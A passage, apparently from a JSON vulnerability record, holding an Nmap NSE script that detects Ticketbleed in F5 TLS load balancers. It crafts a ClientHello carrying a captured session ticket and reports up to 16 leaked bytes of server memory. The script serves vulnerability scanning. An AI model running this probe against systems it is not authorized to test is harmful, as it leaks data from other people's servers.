https://nmap.org/nsedoc/lib/tls.html\")\n return false\n end\n -- Ensure we have the privileges necessary to run the PCAP operations this\n -- script depends upon.\n if not nmap.is_privileged() then\n nmap.registry[SCRIPT_NAME] = nmap.registry[SCRIPT_NAME] or {}\n if not nmap.registry[SCRIPT_NAME].rootfail then\n stdnse.verbose1(\"Not running due to lack of privileges.\")\n end\n\n nmap.registry[SCRIPT_NAME].rootfail = true\n\n return false\n end\n\n return shortport.ssl(host, port) or sslcert.getPrepareTLSWithoutReconnect(port)\nend\n\nlocal function is_vuln(host, port, version)\n -- Checking a host requires a valid TLS Session Ticket. 
The Nmap API\n -- does not expose that information to us, but it is sent\n -- unencrypted near the end of the TLS handshake.\n --\n -- First we must create a socket that is ready to start a TLS\n -- connection, so that we may find the local port from which it is\n -- sending, and can use that information to filter the PCAP.\n --\n -- We should have a way to specify version here, but we don't.\n local socket\n local starttls = sslcert.getPrepareTLSWithoutReconnect(port)\n if starttls then\n local status\n status, socket = starttls(host, port)\n if not status then\n stdnse.debug3(\"StartTLS connection to server failed: %s\", socket)\n return\n end\n else\n socket = nmap.new_socket()\n local status, err = socket:connect(host, port, \"tcp\")\n if not status then\n stdnse.debug3(\"Connection to server failed: %s\", err)\n return\n end\n end\n\n socket:set_timeout(5000)\n\n -- Find out the port we'll be using in our TLS negotiation.\n local status, _, lport = socket:get_info()\n if( not(status) ) then\n stdnse.debug3(\"Failed to retrieve local port used by socket.\")\n return\n end\n\n -- We are only interested in capturing the TLS responses from the\n -- server, not our traffic. 
We need to set the snaplen to be fairly\n -- large to accommodate packets with many or large certificates.\n local filter = (\"src host %s and tcp and src port %d and dst port %d\"):format(host.ip, port.number, lport)\n local pcap = nmap.new_socket()\n pcap:set_timeout(5)\n pcap:pcap_open(host.interface, 4096, false, filter)\n\n -- Initiate the TLS negotiation on the already-connected socket, and\n -- then immediately close the socket.\n local status, err = socket:reconnect_ssl()\n if not status then\n stdnse.debug1(\"Can't connect with TLS: %s\", err)\n return\n end\n socket:close()\n\n -- Repeatedly read previously-captured packets and add them to a\n -- buffer.\n local buf = {}\n while true do\n local status, _, _, layer3, _ = pcap:pcap_receive()\n if not status then\n break\n end\n\n -- Parse captured packet and extract data.\n local pkt = packet.Packet:new(layer3, #layer3)\n if not pkt then\n stdnse.debug3(\"Failed to create packet from captured data.\")\n return\n end\n\n if not pkt:tcp_parse() then\n stdnse.debug3(\"Failed to parse captured packet.\")\n return\n end\n\n local tls_data = pkt:raw(pkt.tcp_data_offset)\n table.insert(buf, tls_data)\n end\n\n buf = table.concat(buf, \"\")\n\n pcap:pcap_close()\n pcap:close()\n\n -- Attempt to find the NewSessionTicket record in the captured\n -- packets.\n local pos, ticket\n repeat\n -- Attempt to parse the buffer.\n local record\n pos, record = tls.record_read(buf, pos)\n if not record then\n break\n end\n if record.type ~= \"handshake\" then\n break\n end\n\n -- Search for the NewSessionTicket record, which contains the\n -- Session Ticket we need.\n for _, body in ipairs(record.body) do\n stdnse.debug1(\"Captured %s record.\", body.type)\n if body.type == \"NewSessionTicket\" then\n if body.ticket then\n ticket = body.ticket\n else\n -- If someone downloaded this script separately from Nmap,\n -- they are likely to be missing the parsing changes to the\n -- TLS library. 
Try parsing the body inline.\n if #body.data <= 4 then\n stdnse.debug1(\"NewSessionTicket's body was too short to parse: %d bytes\", #body.data)\n return\n end\n\n _, ticket = (\">I4 s2\"):unpack(body.data)\n end\n break\n end\n end\n until ticket or pos > #buf\n\n if not ticket then\n stdnse.debug1(\"Server did not send a NewSessionTicket record.\")\n return\n end\n\n -- Create the ClientHello record that triggers the behaviour in\n -- affected systems. The record must include both a Session ID and a\n -- TLS Session Ticket extension.\n --\n -- Setting the Session ID to a 16 bytes allows for the remaining 16\n -- bytes of the field to be filled with uninitialized memory when it\n -- is echoed back in the ServerHelloDone record. Using 16 bytes\n -- reduces the chance of a false positive caused by the server\n -- issuing us a new, valid session ID that just happens to match the\n -- random one we provided.\n local sid_old = rand.random_string(16)\n\n local hello = tls.client_hello({\n [\"protocol\"] = version,\n [\"session_id\"] = sid_old,\n -- Claim to support every cipher\n -- Doesn't work with IIS, but only F5 products should be affected\n [\"ciphers\"] = tableaux.keys(tls.CIPHERS),\n [\"compressors\"] = {\"NULL\"},\n [\"extensions\"] = {\n -- Claim to support common elliptic curves\n [\"elliptic_curves\"] = tls.EXTENSION_HELPERS[\"elliptic_curves\"](tls.DEFAULT_ELLIPTIC_CURVES),\n [\"SessionTicket TLS\"] = ticket,\n },\n })\n\n -- Connect the socket so that it is ready to start a TLS session.\n if starttls then\n local status\n status, socket = starttls(host, port)\n if not status then\n stdnse.debug3(\"StartTLS connection to server failed: %s\", socket)\n return\n end\n else\n socket = nmap.new_socket()\n local status, err = socket:connect(host, port, \"tcp\")\n if not status then\n stdnse.debug3(\"Connection to server failed: %s\", err)\n return\n end\n end\n\n -- Send Client Hello to the target server.\n local status, err = socket:send(hello)\n if not status 
then\n stdnse.debug1(\"Couldn't send Client Hello: %s\", err)\n socket:close()\n return\n end\n\n -- Read responses from server.\n local status, response, err = tls.record_buffer(socket)\n socket:close()\n if err == \"TIMEOUT\" then\n stdnse.debug1(\"Timeout exceeded waiting for Server Hello Done.\")\n return\n end\n if not status then\n stdnse.debug1(\"Couldn't receive: %s\", err)\n socket:close()\n return\n end\n\n -- Attempt to parse the response.\n local _, record = tls.record_read(response)\n if record == nil then\n stdnse.debug1(\"Unrecognized response from server.\")\n return\n end\n if record.protocol ~= version then\n stdnse.debug1(\"Server responded with a different protocol than we requested: %s\", record.protocol)\n return\n end\n if record.type ~= \"handshake\" then\n stdnse.debug1(\"Server failed to respond with a handshake record: %s\", record.type)\n return\n end\n\n -- Search for the ServerHello record, which contains the Session ID\n -- we want.\n local sid_new\n for _, body in ipairs(record.body) do\n if body.type == \"server_hello\" then\n sid_new = body.session_id\n end\n end\n\n if not sid_new then\n stdnse.debug1(\"Failed to receive a Server Hello record.\")\n return\n end\n\n if sid_new == \"\" then\n stdnse.debug1(\"Server did not respond with a session ID.\")\n return\n end\n\n -- Check whether the Session ID matches what we originally sent,\n -- which should be the case for a properly-functioning TLS stacks.\n if sid_new == sid_old then\n stdnse.debug1(\"Server properly echoed our short, random session ID.\")\n return\n end\n\n -- If the system is unaffected, it should provide a new session ID\n -- unrelated to the one we provided. 
Check for the new session ID\n -- being prefixed by the one we sent, indicating an affected system.\n if sid_new:sub(1, #sid_old) ~= sid_old then\n stdnse.debug1(\"Server responded with a new, unrelated session ID.\")\n stdnse.debug1(\"Original session ID: %s\", stdnse.tohex(sid_old, {separator = \":\"}))\n stdnse.debug1(\"Received session ID: %s\", stdnse.tohex(sid_new, {separator = \":\"}))\n return\n end\n\n return sid_new\nend\n\naction = function(host, port)\n local vuln_table = {\n title = \"Ticketbleed is a serious issue in products manufactured by F5, a popular vendor of TLS load-balancers. The issue allows for stealing information from the load balancer\",\n state = vulns.STATE.NOT_VULN,\n risk_factor = \"High\",\n description = [[\nTicketbleed is vulnerability in the implementation of the TLS SessionTicket extension found in some F5 products. It allows the leakage (\"bleeding\") of up to 31 bytes of data from uninitialized memory. This is caused by the TLS stack padding a Session ID, passed from the client, with data to make it 32-bits long.\n ]],\n\n references = {\n \"https://filippo.io/Ticketbleed/\",\n \"https://blog.filippo.io/finding-ticketbleed/\",\n \"https://support.f5.com/csp/article/K05121675\"\n }\n }\n\n -- Accept user-specified protocols.\n local vers = stdnse.get_script_args(SCRIPT_NAME .. \".protocols\") or {\"TLSv1.0\", \"TLSv1.1\", \"TLSv1.2\"}\n if type(vers) == \"string\" then\n vers = {vers}\n end\n\n for _, ver in ipairs(vers) do\n -- Ensure the protocol version is supported.\n if nil == tls.PROTOCOLS[ver] then\n return \"\\n Unsupported protocol version: \" .. 
ver\n end\n\n -- Check for the presence of the vulnerability.\n local sid = is_vuln(host, port, ver)\n if sid then\n vuln_table.state = vulns.STATE.EXPLOIT\n vuln_table.exploit_results = {\n stdnse.tohex(sid:sub(17)),\n (sid:sub(17):gsub(\"[^%g ]\", \".\"))\n }\n break\n end\n end\n\n local report = vulns.Report:new(SCRIPT_NAME, host, port)\n return report:make_output(vuln_table)\nend\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}]}